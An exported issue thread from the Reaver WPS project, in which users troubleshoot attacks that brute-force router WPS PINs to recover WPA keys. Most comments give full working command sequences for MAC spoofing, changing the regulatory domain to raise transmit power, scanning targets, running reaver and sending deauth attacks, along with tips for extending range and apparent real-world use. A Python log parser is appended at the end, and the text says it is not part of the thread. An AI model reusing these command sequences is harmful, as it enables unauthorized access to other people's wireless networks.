amanojha / reaver-wps

Automatically exported from code.google.com/p/reaver-wps

Problem of Reaver hangup on first key solved #361

Open GoogleCodeExporter opened 8 years ago

GoogleCodeExporter commented 8 years ago
I am using Backtrack5R1 that has been upgraded. The reaver program is 1.4. My wireless is an RTL8187.

To get the program to work I must include a mac address statement at the end of the command string, otherwise the program just cycles round and round on the first number or fails to get an association or both. This is the command sequence I use to get reaver to work. When I do this it cracks wpa like it was popcorn. What seems to be important is that when mac spoofing, the mac of wlan0 and its paired virtual monitor must be the same AND the --mac=00:11:22:33:44:55 command assigning the spoofed mac code also must be in the reaver command string. Okay, here is how I do it. Some of the commands are specific only to the RTL8187.

# Clean out any monitors
airmon-ng stop mon0
airmon-ng stop mon1
airmon-ng stop mon2
#
ifconfig wlan0 down # wlan0 designates your actual wifi receiver
ifconfig wlan0 hw ether 00:11:22:33:44:55
# ================ RTL8187 specific power commands
# Following commands set the power for a RTL8187 receiver
iw reg set BO
iwconfig wlan0 txpower 30
iwconfig wlan0 rate 1M
# ================ Ends RTL8187 specific power commands
ifconfig wlan0 up
airmon-ng start wlan0
reaver -i mon0 -a -f -c 11 -b 55:44:33:22:11:00 -vv -x 60 --mac=00:11:22:33:44:55
# You must change the -c 11 to the channel of your target
# You must change the -b 55:44:33:22:11:00 to your target's mac
# Mac code of wlan0 and mon0 must be equal

Original issue reported on code.google.com by muske...@yahoo.com on 30 Jul 2012 at 3:57

GoogleCodeExporter commented 8 years ago
Additions
If you spoof the mac this way for reaver, any aircrack-ng operation will show 
the original mac for the mon0 virtual monitor. Therefore if you want to spoof 
the mac for aircrack you must use:

ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0
ifconfig mon0 up

We are working on the variable mac approach through aireplay-ng as proposed 
elsewhere in these forums.

Original comment by muske...@yahoo.com on 30 Jul 2012 at 6:11

GoogleCodeExporter commented 8 years ago
Sounds cool, will try it soon ;))

Original comment by itmanvn on 30 Jul 2012 at 8:46

GoogleCodeExporter commented 8 years ago
How would I fix something like this though? I tried changing the mac exactly as 
posted. Usually the router responds with M3 and M4 for about 10-15 mins and 
then it starts showing this for the next couple of hours. I tried deauth 
attacks but evidently that's not the issue for 0x04 errors. I'm stumped :/

[+] Switching wlan0 to channel 1
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXXX)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received WSC NACK
[+] Sending WSC NACK

Original comment by ronquil...@gmail.com on 1 Aug 2012 at 1:29

GoogleCodeExporter commented 8 years ago
When we first ran the program we got something similar. Try reading through this:

http://adaywithtape.blogspot.com/2012/01/cracking-wpa-using-wps-vulnerability.html

If you have tried this attack on three (3) or four (4) targets and are getting 
the same result it is probably something in the program itself.
You do not mention how many targets you have tried this attack on and you did 
not mention the operating system or the wifi receiver.

So we will tell you how we do it.

You will find that many think the AWUSO36H wifi receiver works the best for 
this attack.

We run Backtrack5R1 upgraded. This is for other reasons NOT related to reaver. 
We have just made tests with BT5R1 running from a USB with persistence. The 
program worked fine. The only problem we have had is that an 8 gig USB is too 
small. We used a 16 gig flash formatted 3 gig FAT32 / 12 gig ext and it loaded 
fine. We tested it on our router with the -d 0 command set to see if it could 
handle the speed and we were getting 1 key a second. So from flash drive or 
hard drive the program works just fine.

Using BT5R1 we get an internet connection and type

apt-get update

when it is finished we type

apt-get dist-upgrade

This second one takes a while so have patience.

Then type

apt-get install reaver

Now

#!/bin/bash
# Remove virtual monitors
airmon-ng stop mon0
airmon-ng stop mon1
airmon-ng stop mon2
ifconfig wlan1 down
ifconfig wlan1 hw ether 00:11:22:33:44:55
iw reg set BO
iwconfig wlan1 txpower 30
iwconfig wlan1 rate 1M
ifconfig wlan1 up
airmon-ng start wlan1
# Start Wash
wash -i mon0

When you have your target

airmon-ng stop mon2
ifconfig wlan1 down
ifconfig wlan1 hw ether 00:11:22:33:44:55
iw reg set BO
iwconfig wlan1 txpower 30
iwconfig wlan1 rate 1M
ifconfig wlan1 up
airmon-ng start wlan1
#
# Either one below works. The --dh-small can speed up the program BUT we suggest
# you use the bottom one
echo reaver -i mon0 -a -f -c 1 -b 55:44:33:22:11:00 -vv -x 60 --mac=00:11:22:33:44:55 --dh-small
echo reaver -i mon0 -a -f -c 1 -b 55:44:33:22:11:00 -vv -x 60 --mac=00:11:22:33:44:55

Go to this entry and read the comments in the newest script file with the 
embedded deauth we just wrote:
http://code.google.com/p/reaver-wps/issues/detail?can=2&start=100&num=100&q=&colspec=ID%20Type%20Status%20Priority%20Milestone%20Owner%20Summary&groupby=&sort=&id=258
If you still get the same result against three or four targets write me again. 
We are trying a BT5R2 pen drive but it is just being worked on as I am writing 
this.

In closing we love this reaver program.

Musket Team Alpha

Original comment by muske...@yahoo.com on 2 Aug 2012 at 5:30

GoogleCodeExporter commented 8 years ago
Yeah I tried those commands but I'm still getting the same thing. Signal 
strength is around -60dB so I don't think that's the problem. Card is a USB 
wireless adapter, ath9k. It starts showing 0x04 messages after 10-20 mins of 
successful progress on keys and then I either have to stop reaver and try again 
after 5-6 hours or I put a really long timeout into -x. So far I'm at 16.48% 
over the past week. I'm hoping it'll get there quicker. Already tried reaver 
with the same setup on 2 other routers and the only one that worked flawlessly 
(with -d 0) was a Linksys router. I literally had the key in an hour and a half. 
This router is a Belkin though. Causing some problems...

Original comment by ronquil...@gmail.com on 3 Aug 2012 at 10:12

GoogleCodeExporter commented 8 years ago
I tried sending a bunch of deauths and that seems to work for a while but it 
doesn't fix the problem for long.

Original comment by ronquil...@gmail.com on 3 Aug 2012 at 10:13

GoogleCodeExporter commented 8 years ago
If you have cracked a code then the problem is not in your program and we can 
work together to see how to solve this. As noted before we are field operatives, 
meaning we take these programs and use them in the real world. As I see it 
this leaves four (4) variables for you to consider:

1. Wifi receiver
2. Antenna
3. Target AP
4. Distance and/or placement of your wifi adapter's antenna.

1. Your Wifi Receiver: I cannot comment on your wifi adapter type. All I can 
say is that blogs on reaver note that the best type to use is the AWUSO36H 
running the rtl8187 driver. If you can try and test one you can then compare it 
with your current receiver.

2. Antenna: The best reception on a USB receiver is to plug the antenna 
directly into the adapter and place the adapter in a plastic bag outside the 
house. Use USB extensions to do this. If the USB extension has a power plug, 
plug the power plug into a USB splitter. Do not buy a USB extension that has a 
small egg shaped plastic case with a circuit board in it as it will probably 
not work. You want just a simple 5 meter USB extension. If you link USB 
extensions together use rubber bands, not tape, to keep the contacts together.

You can use SMA cable and an antenna if your wifi receiver has an SMA plug 
where the antenna attaches, BUT your reception will be better if the antenna is 
plugged directly into the receiver. You can go online; there are several simple 
antenna modes to increase signal strength.

3. Routers: Some routers are just sticky and slow. If the router is slow and 
dropping your connection then run the last program we wrote. See, I think, 258; 
the best program is on the bottom and has an embedded deauth and a changing mac 
code routine which runs constantly in the background. Read the comments section 
in the script file. It is easy to use.

4. As mentioned, distance, and hence the Relative Signal Strength shown by the 
Relative Signal Strength Indicator (RSSI) in wash, is affected. The three (3) 
comments above are all in an effort to increase signal strength so the program 
functions faster.

In the end a reaver approach is far better than brute force. Hence it takes as 
long as it takes.


Original comment by muske...@yahoo.com on 4 Aug 2012 at 10:01

GoogleCodeExporter commented 8 years ago
One thing to consider, based on what I'm seeing in the Reaver messages in this 
thread, is that poor signal strength and/or interference may be causing the 
router to miss seeing the response messages... or that the responses are sent 
before the router is ready to receive them (notice the continued receipt of M1s 
after M2 had already been sent).

For a long time, I also thought that association/mac addresses were part of the 
problem. On a hunch, I experimented with adding a tiny delay between response 
messages and most of the difficulties I've had with routers have significantly 
dropped. If anyone is interested in trying the solution, I've pasted the 
modified source code here:

http://code.google.com/p/reaver-wps/issues/detail?id=167#c28

Original comment by jeff.j.h...@gmail.com on 27 Aug 2012 at 11:04
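The observation in the last comment (the AP keeps sending M1 after M2 has already gone out) can be checked mechanically against a transcript, and doing so separates two very different outcomes that both end in a WSC NACK. The script below is an added example; it is not part of this thread or of reaver. It parses the reaver output quoted earlier by ronquil... (plus one constructed attempt that reaches M4, marked in the code) and classifies each PIN attempt by how far the WSC registration exchange got. In the WPS registration protocol the AP (enrollee) sends M1, the registrar answers M2, and the AP's NACK after M4 or M6 is its verdict on the PIN proof; an attempt where the AP only ever repeats M1 never had its M2 accepted, so the PIN was never evaluated and the failure is on the link (signal, interference, timing), which is what the comment above argues. Function names such as parse_attempts and diagnose are my own.

```python
import re

# Constructed sample log: the two attempts quoted earlier in this thread, plus
# one constructed attempt that progresses to M4 before the AP NACKs it.
SAMPLE_LOG = """\
[+] Switching wlan0 to channel 1
[+] Waiting for beacon from XX:XX:XX:XX:XX:XX
[+] Associated with XX:XX:XX:XX:XX:XX (ESSID: XXXXX)
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received WSC NACK
[+] Sending WSC NACK
[!] WPS transaction failed (code: 0x04), re-trying last pin
[+] Trying pin 12345670
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin 00005678
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received M1 message
[+] Sending M2 message
[+] Received M3 message
[+] Sending M4 message
[+] Received WSC NACK
[+] Sending WSC NACK
"""

PIN_RE = re.compile(r"^\[\+\] Trying pin (\d+)")
MSG_RE = re.compile(r"^\[\+\] (Received|Sending) (M[1-8]|WSC NACK)")
FAIL_RE = re.compile(r"^\[!\] WPS transaction failed \(code: (0x[0-9a-fA-F]+)\)")


def parse_attempts(log):
    """Split a reaver transcript into per-PIN attempts.

    Each attempt keeps the ordered (direction, message) pairs for the WSC
    registration messages (M1..M8, WSC NACK) and the failure code, if one
    was printed for that attempt.
    """
    attempts = []
    current = None
    for line in log.splitlines():
        pin = PIN_RE.match(line)
        if pin:
            current = {"pin": pin.group(1), "events": [], "fail_code": None}
            attempts.append(current)
            continue
        if current is None:
            continue  # lines before the first PIN attempt (channel, beacon, assoc)
        msg = MSG_RE.match(line)
        if msg:
            current["events"].append((msg.group(1), msg.group(2)))
            continue
        fail = FAIL_RE.match(line)
        if fail:
            current["fail_code"] = fail.group(1)
    return attempts


def diagnose(attempt):
    """Classify one attempt by the last registration message we sent and by
    whether the AP restarted with M1 after our M2 had gone out."""
    events = attempt["events"]
    seen_m2 = False
    m1_after_m2 = 0
    for direction, msg in events:
        if direction == "Sending" and msg == "M2":
            seen_m2 = True
        elif seen_m2 and direction == "Received" and msg == "M1":
            m1_after_m2 += 1
    last_sent = next((m for d, m in reversed(events)
                      if d == "Sending" and m != "WSC NACK"), None)
    got_nack = any(d == "Received" and m == "WSC NACK" for d, m in events)
    if last_sent == "M2" and m1_after_m2:
        stage = "stalled_at_m2"   # AP never accepted M2: PIN not evaluated at all
    elif last_sent in ("M4", "M6") and got_nack:
        stage = "pin_rejected"    # AP answered the PIN-half proof with a NACK
    elif last_sent is None:
        stage = "no_registration"  # never got past EAPOL/identity
    else:
        stage = "in_progress"
    return {"pin": attempt["pin"], "stage": stage,
            "m1_after_m2": m1_after_m2, "fail_code": attempt["fail_code"]}


def summarize(log):
    """Return per-attempt diagnoses and a count of attempts per stage."""
    results = [diagnose(a) for a in parse_attempts(log)]
    counts = {}
    for r in results:
        counts[r["stage"]] = counts.get(r["stage"], 0) + 1
    return results, counts


if __name__ == "__main__":
    results, counts = summarize(SAMPLE_LOG)
    for r in results:
        print(r)
    print(counts)
```

Run on the quoted transcript this reports both real attempts as stalled_at_m2 with three M1 retransmissions each (the first also carrying the 0x04 code), while only the constructed third attempt reaches the point where the AP actually judged a PIN half. A run made up mostly of stalled_at_m2 attempts is therefore not telling you anything about PINs, only about the link.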